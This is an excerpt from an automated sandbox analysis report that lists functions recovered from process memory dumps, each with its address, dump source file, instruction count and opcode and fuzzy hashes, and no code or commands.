                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630645817.00000000094C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94c0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e5ff562e15a093f0be4514af3fea04a260a2240acb102f6fe072f0d5c71e5862
                                                                  • Instruction ID: d9062768953f593d74deda2e9d1b292245e624fa311758092f63970da83a6e26
                                                                  • Opcode Fuzzy Hash: e5ff562e15a093f0be4514af3fea04a260a2240acb102f6fe072f0d5c71e5862
                                                                  • Instruction Fuzzy Hash: 84E01271A01348EBDB04EFB4E941B6D77BAEF85205F5085A8D8059B280DA716F019B92
                                                                  Function 0981298F Relevance: .0, Instructions: 18COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630907814.0000000009810000.00000040.00000800.00020000.00000000.sdmp, Offset: 09810000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_9810000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ff50d3e8a075d48484cc53d3c35aac4d894ab624d98c8f4aeec32c992d5975fe
                                                                  • Instruction ID: 5594fe9f0c8e1bd68bc0cd20551fc4e4bdd4282d26b92ad9974847b4848f1a84
                                                                  • Opcode Fuzzy Hash: ff50d3e8a075d48484cc53d3c35aac4d894ab624d98c8f4aeec32c992d5975fe
                                                                  • Instruction Fuzzy Hash: 1AF06C78A04A14CFC754CF28C884A59BBB1FF49215F1141E9E40EA7360CB30AD80CF01
                                                                  Function 094CDD08 Relevance: .0, Instructions: 17COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630645817.00000000094C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94c0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 91ecb7c384a1d9926f61b026e4ac358ba0b0452f59c011bec98cf7acbf93b220
                                                                  • Instruction ID: a09498d805a860fe8416a066832f54e23d17829daf57c7f9590719b71e92b5ff
                                                                  • Opcode Fuzzy Hash: 91ecb7c384a1d9926f61b026e4ac358ba0b0452f59c011bec98cf7acbf93b220
                                                                  • Instruction Fuzzy Hash: 46E01270A01208EFCB00EFA4E94565DB7F9EB49305F1085A9D809D7340D971AF019B91
                                                                  Function 094CB80A Relevance: .0, Instructions: 17COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630645817.00000000094C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94c0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5ca447117e26259aaad56fd4843996fa586b47572942553a6c4a42e24c5736be
                                                                  • Instruction ID: 384c1a0d5e6e945d1f08670eb012141f0cbe1dd74766cd7bbab4664efd6cbafe
                                                                  • Opcode Fuzzy Hash: 5ca447117e26259aaad56fd4843996fa586b47572942553a6c4a42e24c5736be
                                                                  • Instruction Fuzzy Hash: 48E08CB9D092E1DFEB918E50E94C7DD3375BB01361F0942BA988A67384EB748C41CB93
                                                                  Function 094BED08 Relevance: .0, Instructions: 17COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630621166.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94b0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6dc932b673a8675fb7d1ae2dbf79b08ac12d2990b81db4a236140d01c385eab6
                                                                  • Instruction ID: b7552f9e17b70241dd1c78323ddc87e251c5b52bfc335e0572063e0e9c499435
                                                                  • Opcode Fuzzy Hash: 6dc932b673a8675fb7d1ae2dbf79b08ac12d2990b81db4a236140d01c385eab6
                                                                  • Instruction Fuzzy Hash: 0BE017310057449FC74ADF38E4458A4BFB0FF5631131642DBE042CB572C6729828CB10
                                                                  Function 094C18D0 Relevance: .0, Instructions: 13COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630645817.00000000094C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94c0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 17ce0c8a083c29ff9d59ed808276baaedb0caeb932590a42022888d97831b766
                                                                  • Instruction ID: bdeca224fc4c4937b944cc7ae584ff99fcdb042e735d29387601d6679bed3ac7
                                                                  • Opcode Fuzzy Hash: 17ce0c8a083c29ff9d59ed808276baaedb0caeb932590a42022888d97831b766
                                                                  • Instruction Fuzzy Hash: 56D0C9710093C0DEC383ABF4A5591883F60AD0712130A04CAE0E9DE437EA280810CB33
                                                                  Function 094C5C9B Relevance: .0, Instructions: 13COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630645817.00000000094C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94c0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 529dca749f2e9af48c2a0d031f71301199ee5026334c8b5051a1e15eeeb263db
                                                                  • Instruction ID: 645d14be6675a469a84f1b0d0c6ac0eb581418e46ded468ad0f382c84979292f
                                                                  • Opcode Fuzzy Hash: 529dca749f2e9af48c2a0d031f71301199ee5026334c8b5051a1e15eeeb263db
                                                                  • Instruction Fuzzy Hash: B4D0A9AAD0C6288FD3608A40880938C76A19B44351F0A81BBD00EA3250FA390C424A82
                                                                  Function 094CAC96 Relevance: .0, Instructions: 13COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630645817.00000000094C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94c0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a4374f3e793f354187f77768ef69a9e44a0df22641793594f4fa44e068034d83
                                                                  • Instruction ID: 47462298bf7e6ef807e18d56ac99ff8017ae2ce8d6ac18c8f74d5037f11738a9
                                                                  • Opcode Fuzzy Hash: a4374f3e793f354187f77768ef69a9e44a0df22641793594f4fa44e068034d83
                                                                  • Instruction Fuzzy Hash: 54D05E79D0A2D1DFEB805B10E94C79D3734BF02351F045276D48A57344DB348C418B93
                                                                  Function 094BB608 Relevance: .0, Instructions: 13COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630621166.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94b0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 393e6d5dde940d2b742431e3bd80573f20f922cecb55492ce81105bc8015e535
                                                                  • Instruction ID: 68c871ad18276985cc2c3a3d8c8c04cfcb63782833d1b87dbba37df3581615a8
                                                                  • Opcode Fuzzy Hash: 393e6d5dde940d2b742431e3bd80573f20f922cecb55492ce81105bc8015e535
                                                                  • Instruction Fuzzy Hash: 0FD0C935451608AFC7599F64D449CE97BF0EF69311B1680EAE8098B673C7328D24DB40
                                                                  Function 094C5C76 Relevance: .0, Instructions: 8COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630645817.00000000094C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94c0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e144ddf26e14c4889d2cd5fb9935d4d7175c1f353be70d2d95b796b46300d149
                                                                  • Instruction ID: 91aaa8bc93ecd70b0071f7d2b8f4c3f5af688d246b8c85f5a8a8977cc237ae51
                                                                  • Opcode Fuzzy Hash: e144ddf26e14c4889d2cd5fb9935d4d7175c1f353be70d2d95b796b46300d149
                                                                  • Instruction Fuzzy Hash: 06D0EA79A04624CFD7A0CB64C884B58B7B2AB49310F1581EAE90EA7360CB31AD85CF51
                                                                  Function 094BB618 Relevance: .0, Instructions: 8COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630621166.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94b0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                                  • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                                                  • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                                  • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                                                                  Function 094C41C3 Relevance: .0, Instructions: 7COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630645817.00000000094C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94c0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d1ce4b71ef272e978efe894d30634012b8926d5bc84706439a1ff71d55100108
                                                                  • Instruction ID: d814ec4d185dda44f66a72af65991415ed0b7c8fbf5609a44d18996ab2991aa3
                                                                  • Opcode Fuzzy Hash: d1ce4b71ef272e978efe894d30634012b8926d5bc84706439a1ff71d55100108
                                                                  • Instruction Fuzzy Hash: D4B092BCA55280CFA6857A62AA6C23E76A26A803C4704501EDD0282278DF3088028A12
                                                                  Function 094C9597 Relevance: .0, Instructions: 7COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630645817.00000000094C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94c0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7e5ff05e7002e081ee5978ddd4c8332f6e36d8fbbfcd2bc780fd26e8448a6b91
                                                                  • Instruction ID: 43193d58c792e5d1b388fdccb85984eee8dcb17f4c9cfed27c489ffc4ac89ec5
                                                                  • Opcode Fuzzy Hash: 7e5ff05e7002e081ee5978ddd4c8332f6e36d8fbbfcd2bc780fd26e8448a6b91
                                                                  • Instruction Fuzzy Hash: F8B0923BA0002986CA00D688E4404DCBB31DA98232F408033C200620008621157A8A60
                                                                  Function 094C18E0 Relevance: .0, Instructions: 7COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630645817.00000000094C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94c0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7289ae44505292f243063dc90ab1aca8100821f79d31903e07f428d7f6f0909a
                                                                  • Instruction ID: a6be6db46521803fc2a0efc82f5f3a653de8fbbe29165544627dd726ed219fd6
                                                                  • Opcode Fuzzy Hash: 7289ae44505292f243063dc90ab1aca8100821f79d31903e07f428d7f6f0909a
                                                                  • Instruction Fuzzy Hash: E3A0243000430CCF45C037F7340DF0C330C5C440057401045F01C744055D3410004477
                                                                  Function 094CD68A Relevance: .0, Instructions: 6COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630645817.00000000094C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94c0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2d1b1facea1e2724de2ed71de882cb0639f071a84debed9243d1a95a1cc30932
                                                                  • Instruction ID: 022f18ccee29977e082dc065eef861c14122cda3b11b1e9bbc83659e33e9a6f7
                                                                  • Opcode Fuzzy Hash: 2d1b1facea1e2724de2ed71de882cb0639f071a84debed9243d1a95a1cc30932
                                                                  • Instruction Fuzzy Hash: BCA01262044080C3420107F4B2181A03B20541101A30C05C5A04C94D16C52380205502
                                                                  Function 094CD690 Relevance: .0, Instructions: 5COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630645817.00000000094C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94c0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 36c5e3fbef0245cac6fcad3ed8f99f821a3832bf3969e949cbb5bc6cdc95ab67
                                                                  • Instruction ID: 14bae8862a4bdaa941b9f4806f371f2c9e26a500f7fd5d06c338de868bb19551
                                                                  • Opcode Fuzzy Hash: 36c5e3fbef0245cac6fcad3ed8f99f821a3832bf3969e949cbb5bc6cdc95ab67
                                                                  • Instruction Fuzzy Hash: D190023104874CCB46802799740D6A5775C95449267805191A50D815065E65A4604596
                                                                  Function 094B9210 Relevance: .0, Instructions: 2COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630621166.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94b0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c289d1a75c4e2078ed7eece625d375a455ccfb991979859db5c7165dc2264d23
                                                                  • Instruction ID: 1c3b25457347778b1c799b49dcdae6ba1fb86c7567627d64162acbebc04da7bc
                                                                  • Opcode Fuzzy Hash: c289d1a75c4e2078ed7eece625d375a455ccfb991979859db5c7165dc2264d23
                                                                  • Instruction Fuzzy Hash:

                                                                  Non-executed Functions

                                                                  Function 094C7EA0 Relevance: 5.1, Strings: 4, Instructions: 131COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630645817.00000000094C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94c0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: `*%$`*%$x5%$x5%
                                                                  • API String ID: 0-1451492140
                                                                  • Opcode ID: 90db40797ec268c5336a33ae8dbef66659f06762de018b3f01498754c6b6307b
                                                                  • Instruction ID: b32814d612b94eb26b14f463de620099bb5c75189aff6f8228a329ad83b765cc
                                                                  • Opcode Fuzzy Hash: 90db40797ec268c5336a33ae8dbef66659f06762de018b3f01498754c6b6307b
                                                                  • Instruction Fuzzy Hash: 45418BB9A04125CFC790CB2AD880A3AB3A5BF45384F46546EE906DB361DB32DC428B60